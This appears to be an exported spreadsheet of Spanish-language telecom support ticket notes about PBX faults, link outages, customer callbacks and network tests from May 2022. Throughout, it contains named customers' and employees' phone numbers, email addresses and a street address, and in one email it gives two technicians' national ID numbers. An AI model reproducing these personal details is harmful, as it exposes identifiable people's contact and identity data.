    <t>CLIENTE NOS INDICA QUE ELLA UTILIZA INTERNET DE OTRO PROVEEDOR PARA CONECTARSE A SU PBX.  PROVEEDOR DE PBX INDICA QUE EL PROBLEMA NO ES DE PLANTA, POR LO QUE SE ESPERA QUE A LAS 14 HORAS NOS CONFIRME CLIENTE SI PUDO RESOLVERLO CON SUS PROVEEDORES O SE PROCEDERA E ENVIAR PERSONAL TECNICO PARA CERTIFICAR Y DEMOSTRAR QUE EL PROBLEMA NO ES DE CLARO ##
NOTA: CLIENTE NO TIENE LLAMADAS ENTRANTES, SALIENTES NI ENTRE EXTENSIONES.</t>
  </si>
  <si>
    <t>CLAUDIA MONTERROSO-35695817 -- SE TIENE EN LINEA- ##
3001057766
COLA:
NOMBRE: A: 35695817
NÚMERO: 35695817
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 35695817
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/05/2022 12:13:51</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA MONTERROSO AL 35695817   - 66466051 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001094485 - 3001094675
**</t>
  </si>
  <si>
    <t>F4583402</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 17:13
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; VITAL CUEVAS OSCAR ALBERTO &lt;OVCUEVAS@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCGMD0010M-P ::: TICKET CNOC IMGMD005192 ::: ENLACE CAIDO
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ANTHONY JIMENEZ 507 69200154 ACTUALMENTE EN LLAMADA, SE PROCEDE A LLAMAR A UFINET ...</t>
  </si>
  <si>
    <t>UFINET CRISTIAN VASQUEZ INFORMA QUE EN BREVE EL INGENIERO DE TURNO SE CONTACTARA CON CLIENTE, CLIENTE SR.  ANTHONY JIMENEZ PROPORCIONA NUEVO CONTACTO DE LA OFICINA 507 63970975.</t>
  </si>
  <si>
    <t>***---  CL INDICA QUE SE CONTACTE A PR EN HORARIO LABORAL --*-*
DE: CASTAÑEDA CUEVAS CARLOS EMILIO [MAILTO:CCCUEVAS@UNINET.COM.MX]
ENVIADO EL: MARTES, 31 DE MAYO DE 2022 02:18
PARA: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; SÁNCHEZ MEJÍA LESLIE DENISS &lt;LSMEJIA@UNINET.COM.MX&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; VITAL CUEVAS OSCAR ALBERTO &lt;OVCUEVAS@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCGMD0010M-P ::: TICKET CNOC IMGMD005192 ::: ENLACE CAIDO
ESTIMADOS,
SE PUEDE CONTACTAR EN HORARIO LABORAL.
SALUDOS</t>
  </si>
  <si>
    <t>F4583405</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEX FRANCISCO 57443709 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001044157</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE 78883421 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001043517</t>
  </si>
  <si>
    <t>F4583410</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ASTRID PONCE 58622143 PARA SOLICITAR DATOS DE VISITA Y BRINDA LOS SIGUIENTES **
HORARIO DE ATENCION: 700 AM A 15:50:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS SOLICITA QUE SE ENVIE CORREO CON DATOS DEL PERSONAL QUE SE PRESENTARAN AL CORREO ASISTEADMON@MEGAEQUIPOS.COM.GT
DIRECCION: 2 AVE. 44-48 ZONA 12 MONTE MARIA 1
ATENDERA EN SITIO:  ASTRID PONCE
ID 3001081015
**</t>
  </si>
  <si>
    <t>SE INFORMA A TEC ERWIN DEL CID, INDICA QUE ESTARA NOTIFICANDO A CLIENTE.
SE PROCEDE A CONTACTAR A CLIENTE ASTRID PONCE 58622143 PARA VALIDAR LAS PRUEBAS E INDICARLE QUE SE DE SEGUIMIENTO CON EL PROVEEDOR, PERO NO SE TIENE RESPUESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIA PRUEBAS DE TRAZA AL CLIENTE
F4583410 / MEGA EQUIPOS CONSTRUCCION S.A.- 02 AVENIDA 44-48 ZONA 12 MONTE MARIA 1 GUATEMALA / GDN 22100700
¿
MICROSOFT OUTLOOK
MAR 31/05/2022 12:00
NO SE PUDO ENTREGAR EL MENSAJE A ASISTEADMIN@MEGAEQUIPOS.COM.GT. ASISTEADMIN NO SE ENCONTRÓ EN MEGAEQUIPOS.COM.GT. MONICA.CASTILLO OFFICE 365 ASISTEADMIN ACCIÓN NECESARIA DESTINATARIO DIRECCIÓN PARA DESCONOCIDA SOLUCIÓN ES POSIBLE QUE LA DIRECCIÓN ESTÉ MAL
MONICA YIREH CASTILLO POON
BUENAS TARDES ESTIMADOS,
SEGÚN LO PLATICADO ANTERIORMENTE VÍA TELEFÓNICA, ADJUNTAMOS LAS PRUEBAS REALIZADAS EN CONJUNTO CON EL TÉCNICO EN SITIO, PERSONAL DEL ÁREA DE CONMUTACIÓN Y EL ÁREA MÓVIL.
FAVOR SU APOYO ESCALANDO CON EL PROVEEDOR DE LA PBX PARA VALIDAR LA CONFIGURACIÓN DE LA MISMA.
CUALQUIER DUDA O CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS,</t>
  </si>
  <si>
    <t>SE HABLA CON TEC ERWIN DEL CID QUIEN INDICA QUE YA LE EXPLICO AL CLIENTE DE LAS PRUEBAS Y TRAZAS REALIZADAS, CLIENTE ASTRID SOLICITA QUE SE ENVIE UN CORREO CON LAS PRUEBAS DE TRAZA PARA QUE ELLOS DEN SEGUIMIENTO CON EL PROVEEDOR.
TECNICO SE PROCEDE A RETIRAR
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NOS CONTESTA PERO NO NOS ESCUCHA, SE TRATA DE LOCALIZAR NUEVAMENTE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ASTRID PONCE 58622143 PARA QUE NOS BRINDE A QUE NUMEROS NO PUEDE REALIZAR LLAMADAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4583411</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VÍCTOR TECUN AL 37610279 INDICA QUE NECESITA REALIZAR PRUEBAS || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001051396
**</t>
  </si>
  <si>
    <t>SE LLAMA A PERSONAL CENTRAL BANTRAB VICTOR TECUN 37610279 QUIEN VALIDA SERVICIOS OPERATIVOS PARA FALLAS F4583411 F4582925 Y AUTORIZA CIERRE DE TICKET
3001111316
COLA:
NOMBRE: A: 37610279
NÚMERO: 37610279
DURACIÓN: 0:04:46
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 37610279
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 30/05/2022 15:02:11</t>
  </si>
  <si>
    <t>F4583421</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 16:57
PARA: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; ELSALVADOR_ITTCASOS@DAVIVIVIENDA.COM.SV &lt;ELSALVADOR_ITTCASOS@DAVIVIVIENDA.COM.SV&gt;
CC: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; BRENDA MARISOL DE PAZ PEREZ &lt;BRENDA.DEPAZ@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE ACCESOS | IP2025145 || LA LIBERTADKM 26FTE A RES BOSQUES DE LOURDES
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE ENCONTRABA TARJETA HWIC  INHIBIDA EN ROUTER CISCO
&lt;LCOLSVZKN2D1EID1&gt;PING -C 1500 -M 30 -B  -VPN-INSTANCE HSBC_ATM 10.152.241.204
  PING 10.152.241.204: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.152.241.204 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 4/5/30 MS</t>
  </si>
  <si>
    <t>F4583423</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RENE GODINEZ AL 47041047  INDICA QUE SIGUE REALIZANDO PRUEBAS SOLICITA
 LLAMADA EN 35 MIN**
ID 3001068615
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RENE GODINEZ AL 47041047  CLIENTE SOLICITA QUE SE LE LLAME EN 25 MIN NUEVAMENTE YA QUE ESTA REALIZANDO PRUEBAS **
ID 3001057913
**</t>
  </si>
  <si>
    <t>F4583439</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE- MARLON HERNADEZ-45174002   - SE TIENE EN LINEA ##
3001051350
COLA:
NOMBRE: A: 45174002
NÚMERO: 45174002
DURACIÓN: 0:00:48
ESTADO: CONECTADA
DETALLES: 45174002
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/05/2022 11:57:27</t>
  </si>
  <si>
    <t>F4583474</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A WALTER DAVILA 87400258, CLIENTE COMENTA QUE NO RECIBE LLAMADAS DESDE NÚMEROS CLARO Y TIGO HACIA EL GDN 22819000, SE ESTÁN REALIZANDO PRUEBAS Y AL MOMENTO LAS LLAMADAS YA ESTAN COMPLETANDO, SE CONTINÚA EN PRUEBAS. ID:3001065180</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER DAVILA 87400258  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001067722</t>
  </si>
  <si>
    <t>INFORMA CLIENTE WALTER DAVILA 87400258 QUE YA TODAS LAS LLAMADAS DONDE DABA INCONVENIENTE COMPLETARON, SOLICITE SE VALIDE A LAS 3 PM.
ID DE LLAMADA: 3001065180</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER DAVILA 87400258 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001113134 - 3001113492</t>
  </si>
  <si>
    <t>F4583483</t>
  </si>
  <si>
    <t>SE LLAMA A KEVIN PARA SEGUIMIENTO E INFORMARLE QUE POR PARTE DE CLARO NO SE TIENE INCONVENIENTE, DEBERAN DE REVISAR A NIVEL INTERNO YA QUE NO SE ASOCIA NINGUNA MAC DE EQUIPOS INTERNOS(LAN) HACIA ROUTER DE CLARO
CLIETNE NO RESPONDE ENVIA A BUZON---</t>
  </si>
  <si>
    <t>F4583488</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE GILBERTO.RAMIREZ (502) 54661746 INDICA QUE EL SERVICIO YA ESTA ACTIVO, TOMAR EN CUENTA QUE EL GDN 22838813 NO ESTA CONFIGURADO PARA LLAMADAS ENTRANTES, CLIENTE ESTA REALIZANDO PRUEBAS Y SOLICITA LLAMADA  A LAS 17:00 HORAS
3001073998
SE BORRA EL CONTADOR DE ERRORES EN EL EQUIPO AETHRA
/_/DID_ASI_TEG54_1234510\ISDN\ISDN-PRI1&gt;&gt;SHOW STATISTICS -S
STATISTICS OF ISDN-PRI1 INTERFACE
-------------RX----------TX----------
PACKETS    : 297         297
CRC ERRORS : 0
ABORTED    : 0
TOO LONG   : 0
OVERRUN    : 0
UNDERRUN   :             0
COMMAND EXECUTED
/_/DID_ASI_TEG54_1234510\PRI1&gt;&gt;SHOW STATISTICS -S
STATISTICS OF PRI1 INTERFACE
-------------RX----------TX----------
LOS  ALARMS: 0
LOF  ALARMS: 0
AIS  ALARMS: 0           0
RAI  ALARMS: 1           0
BER  ALARMS: 0
CODE ERRORS: 0
FAS  ERRORS: 0
CRC  ERRORS: 0
FEBE ALARMS: 0
BER(LOCAL) : 0.00E+00
BER(REMOTE): 0.00E+00
COMMAND EXECUTED</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GILBERTO.RAMIREZ 54661746 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001160661</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CALL CENTER HN, COMUNICA AL CLIENTE  GILBERTO.RAMIREZ (502) 54661746 INDICA QUE NO TIENE LLAMADAS SALIENTES, PERO AL REALIZAR LAS PRUEBAS COMPLETAN CORRECTAMENTE, SE DARÁ SEGUIMIENTO A LAS 17:00 HORAS
3001079140
COLA:
NOMBRE: DE: 22222222
NÚMERO: 22222222
ESTADO: CONECTADA
DURACIÓN: 0:03:38
DETALLES: 22222222
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 30/05/2022 13:17:59</t>
  </si>
  <si>
    <t>F4583504</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS LOPEZ 22098142 - 79858983 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001187603 - 3001187924</t>
  </si>
  <si>
    <t>F4583526</t>
  </si>
  <si>
    <t>SE LLAMA A CONTACTO ENCONTRADO EN TICKETS ANTERIORES, BERNABE TORRES, INDICA QUE POSIBLEMENTE SEA FALLA DE ENERGIA, COMENTA QUE SE LE LLAME EL DIA DE MAÑANA A LAS 9 AM SI NO HA RESTABLECIDO EL ENLACE PARA QUE CONFIRME TEMA DE FALLA DE ELECTRICA.
3001203121
COLA:
NOMBRE: A: 40713148
NÚMERO: 40713148
DURACIÓN: 0:02:24
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 40713148
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 30/05/2022 18:09:46</t>
  </si>
  <si>
    <t>F4583533</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 89884179 MENCIONA QUE PRESENTARON PROBLEMA DE ENERGIA PERO YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001100939</t>
  </si>
  <si>
    <t>F4583535</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  GUILLERMO HERNANDEZ 85776372 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001125291
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GUILLERMO HERNANDEZ 85776372 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001157481
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO BALTODANO 89884602 NO RESPONDE ENVIA A BUZON **
ID 3001125825
**</t>
  </si>
  <si>
    <t>F4583556</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY SEGOVIA 60670084 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001182851</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BLADIMIR RIVERA 0050374354248 CONTESTA SE TENIA EN LINEA PERO SE CORTA LLAMADA SE INTENTA NUEVAMENTE PERO NO RESPONDE **
ID 3001165093 - 3001165783
**</t>
  </si>
  <si>
    <t>F4583558</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. CABALLERO AL 75728871 RESPONDE PERO CORTA LLAMADA || SE INTENTARA LUEGO **
ID 3001087687
**</t>
  </si>
  <si>
    <t>F4583560</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN SALDAÑA AL 72232837 INDICA QUE AUN TIENE PING MUY ALTO Y NO LE LLEGA EL ANCHO DE BANDA CONTRATADO || SE NOTIFICA A GESGTOR**
ID 3001089000
**</t>
  </si>
  <si>
    <t>***
SE LOGRA CONVERSAR CON CLIENTE KEVIN SALDAÑA 503 72232837 (ID 2001581578), INFORMA QUE SI ESTARÁ ATENDIENDO AL PERSONAL TÉCNICO EL DÍA DE HOY A LAS 13H
***</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN SALDAÑA 72232837  MENCIONA QUE PERSISTE EL INCONVENIENTE DE ANCHO DE BANDA Y PING MUY ELEVADO, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001270214 - 3001270767</t>
  </si>
  <si>
    <t>F4583562</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE LEONARDO BOJ PARA VALIDAR PERO NO RESPONDE.
3001116993
COLA:
NOMBRE: A: 55167582
NÚMERO: 55167582
DURACIÓN: 0:00:29
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55167582
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 30/05/2022 15:15:24
RESULTADO: LLAMADA HECHA
NOMBRE: 55167582
NÚMERO: 55167582
INICIO: HOY, 15:11
FIN: HOY, 15:12
DURACIÓN: 0:35
ID DE LLAMADA: 3001116276
Y AL NUMERO PILOTO OPCIÓN 0 NADIE RESPONDE
RESULTADO: LLAMADA HECHA
NOMBRE: 79621250
NÚMERO: 79621250
INICIO: HOY, 15:11
FIN: HOY, 15:11
DURACIÓN: 0:15
ID DE LLAMADA: 3001116129
RESULTADO: LLAMADA HECHA
NOMBRE: 79621250
NÚMERO: 79621250
INICIO: HOY, 15:12
FIN: HOY, 15:13
DURACIÓN: 0:45
ID DE LLAMADA: 3001116515
3001117163
COLA:
NOMBRE: A: 79621250
NÚMERO: 79621250
DURACIÓN: 0:01:03
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 79621250
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 30/05/2022 15:16:10</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LEONARDO BOJ AL 55167582 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001261495
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 55167582 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; POR LA HORA CLIENTE FUERA DE HORARIO LABORAL, SE DEBE LLAMAR MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE LEONARDO BOJ, NO RESPONDEN, SE NECESITA REINICIAR AETHRA.
3001090540
COLA:
NOMBRE: A: 55167582
NÚMERO: 55167582
DURACIÓN: 0:00:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55167582
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 30/05/2022 13:51:39
3001090688
COLA:
NOMBRE: A: 55167582
NÚMERO: 55167582
DURACIÓN: 0:00:15
ESTADO: MARCANDO
DETALLES: 55167582
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 30/05/2022 13:51:54</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE BOJ NO RESPONDE
3001130122
COLA:
NOMBRE: A: 55167582
NÚMERO: 55167582
DURACIÓN: 0:00:09
ESTADO: MARCANDO
DETALLES: 55167582
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 30/05/2022 15:54:41
SE LLAMA AL NUMERO PILOTO 79621250 OPCIÓN 0 NADIE RESPONDE TAMPOCO
3001130225
COLA:
NOMBRE: A: 79621250
NÚMERO: 79621250
DURACIÓN: 0:00:01
ESTADO: MARCANDO
DETALLES: 79621250
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 30/05/2022 15:54:58</t>
  </si>
  <si>
    <t>F4583580</t>
  </si>
  <si>
    <t>SE HABLÓ CON CARLOS MAZARIEGOS/PR 32564613 INDICA QUE ESTÁN CON ENLACE BACK UP DE PROVEEDOR, PIDE SE VERIFIQUE SI AÚN SIGUE DOWN SERVICIO, ÉL PUEDE APOYAR A HACER PRUEBAS HASTA LAS 15:15 HORAS, LUEGO DESPUÉS ESTARÁ DISPONIBLE DESPUÉS DE LAS 17:00 HORAS.</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON JEFRI BUSAINZ/CENTRAL 506 41093047 SE LE INDICA LO DICHO POR GESTIÓN N1, INDICA QUE REALIZARÁ PRUEBAS CON SU PR; INDICA QUE DEVOLVERÁ LLAMADA.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MAZARIEGOS AL 32564613 NO RESPONDE, ENVIA A BUZON
SE INTENTARA LUEGO **
ID 3001127637
**</t>
  </si>
  <si>
    <t>SE LLAMÓ HASTA 3 VECES A GESTOR ASIGNADO, PERO NO CONTESTA, TENDRÁ PROBLEMAS CON CIC/AUDIO?
SE LLAMÓ DE NUEVO CONTESTA LEONEL RODAS/GESTOR N1, ÉSTE INDICA QUE VERIFICARÁ.</t>
  </si>
  <si>
    <t>F4583583</t>
  </si>
  <si>
    <t>SE LLAMA A SELVIN QUIEN INDICA QUE SE ENCUENTRA EN ALMUERZO SOLICITA LLAMADA EN 40 MINUTOS-
58278836</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE AUTORIZANDO LOS PERMISOS DE PERSONAL TECNICO
DE: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 8:40
PARA: KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;
CC: TIC - DIRECCION DE TELECOMUNICACIONES &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
ASUNTO: RE: ENLACE CAIDO AGENCIA 151 SALAMA PLAZA LA HACIENDA
BUEN DÍA
SE BRINDA ACCESO EL DÍA DE HOY EN HORARIO DE 9:00 A 18:00 HRS.
*-*-*-*</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A BANRURAL PARA SOLICITAR ACCESOS PARA MAÑANA MARTES 9:30 HRS || PENDIENTE CONFIRMACIÓN
ERITO FERNANDO TECU XITUMUL
ASUNTO: SOLICITUD ACCESOS VISITA TÉCNICA AGE 151 || ID: 8900639T || SALAMA CENTRO C.C. PLAZA LA HACIENDA
BUENA TARDE ESTIMADOS BANRURAL.
EN SEGUIMIENTO AL SERVICIO REPORTADO AGE 151 || ID: 8900639T  || SALAMA CENTRO C.C. PLAZA LA HACIENDA KM.145.5 RUTA DE GUATEMALA A SALAMA. SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR LOS ACCESOS CORRESPONDIENTES PARA EL PERSONAL TÉCNICO QUE ATENDERÁ LA VISITA PARA EL DÍA DE MAÑANA MARTES 31/05 A PARTIR DE LAS 9:30 HORAS.
ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO ASIGNADO.
WILDER ARNOLDO, RICO LOPEZ   IBM.718081 DPI:2680948611601
ERICK MARLON ALEXANDER, CHAVEZ CORTEZ IBM:540002 DPI:1888494491501
QUEDAMOS ATENTOS A SU CONFIRMACIÓN PARA PROCEDER.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE YA RECONECTO EL CABLE DE RED PERO SIGUE SIN DAR LNK-- ESTA INTENTANDO REALIZAR RECONEXION DE CABLE DE RED INDICA QUE ESTA CONECTANDO A OTRO PUERTO TANTO EN EL CTC COMO EL ROUTER PERO SE VALIDA QUE NO DA LNK. CLIENTE INDICA QUE ESTA TRATANDO DE UBICAR OTRO CABLE DE RED PARA VALIDAR SI NO ES ESE EL INCONVENIENTE. DEJA EN ESPERA-</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO AL QUE CC SOLICITA SE SIGA SEGUIMIENTO CON CENTRAL BANRURAL || PENDIENTE CONFIRMEN ACCESOS PARA TECNICOS
ASUNTO: RE: ENLACE CAIDO AGENCIA 151 SALAMA PLAZA LA HACIENDA</t>
  </si>
  <si>
    <t>SE LLAMA A SELVIN PARA REALIZAR PRUEBAS PERO NO RESPONDE--&gt;&gt;
